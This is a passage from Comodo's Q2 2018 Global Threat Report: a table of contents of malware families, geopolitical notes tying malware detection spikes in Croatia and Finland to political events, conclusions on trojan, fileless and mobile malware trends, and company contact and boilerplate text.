                • 32 WinstarNssmMiner a system killer
                • 33 CoinMiner kills rivals
                • 34 CoinHive changes its skin
                • 35 Cryptocurrency clipboard hijacker intercepts transfers
                  • 4 Android Devices Under Siege
                    • 41 Spying Stealing Mining
                      • 411 KevDroid
                      • 412 Zoo Park
                      • 413 MikeSpy
                      • 414 Xloader
                      • 415 Stalker Spy
                      • 416 Mystery Bot
                      • 417 FakeSpy
                      • 418 RedAlert
                      • 419 Hero Rat
                      • 4110 Sonvpay
                      • 4111 CoinHive
                        • 42 Android Malware Catalogued by Month
                          • 421 April 2018
                          • 422 May 2018
                          • 423 June 2018
                              • 5 Malware in Q2 2018 The Big Picture
                                • 51 Strategic Threat Computer Worms
                                  • 511 Generic Worms
                                  • 512 Net Worms
                                  • 513 Email Worms
                                  • 514 p2p Worms
                                  • 515 IM Worms
                                    • 52 High Threat Malware
                                      • 521 Backdoors
                                      • 522 Viruses
                                      • 523 Trojans
                                      • 524 Exploits
                                        • 53 Medium Threat Malware
                                          • 531 Constructor
                                          • 532 Packers
                                          • 533 Email Flooder
                                          • 534 Virtual Tools
                                          • 535 Jokes
                                            • 54 Low Threat Malware Applications
                                              • 541 Applications
                                              • 542 Unwanted Applications
                                              • 543 Unsafe Applications
                                                  • 6 Vertical analysis
                                                  • 7 Geopolitical Intelligence
                                                    • 71 USA
                                                    • 72 China
                                                    • 73 South Korea
                                                    • 74 North Korea
                                                    • 75 Armenia
                                                    • 76 Belarus
                                                    • 77 Iraq
                                                    • 78 Ukraine
                                                    • 79 Croatia
                                                    • 710 Finland Russia USA
                                                      • 8 Conclusions

Global Threat Report Q2 2018 Edition

Page 71 of 73

79 Croatia

Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo

Global Threat Report Q2 2018 Edition

Page 72 of 73

710 Finland Russia USA

Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place

Global Threat Report Q2 2018 Edition

Page 73 of 73

8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information, or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.


Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531, Tel: +1 (888) 266 6361, Int: +1 (703) 581 6361, Fax: +1 (973) 777 4394. sales@comodo.com

Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania, Europe. Tel: +40 332 806 772

Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800. www.comodo.co.in

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees), analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
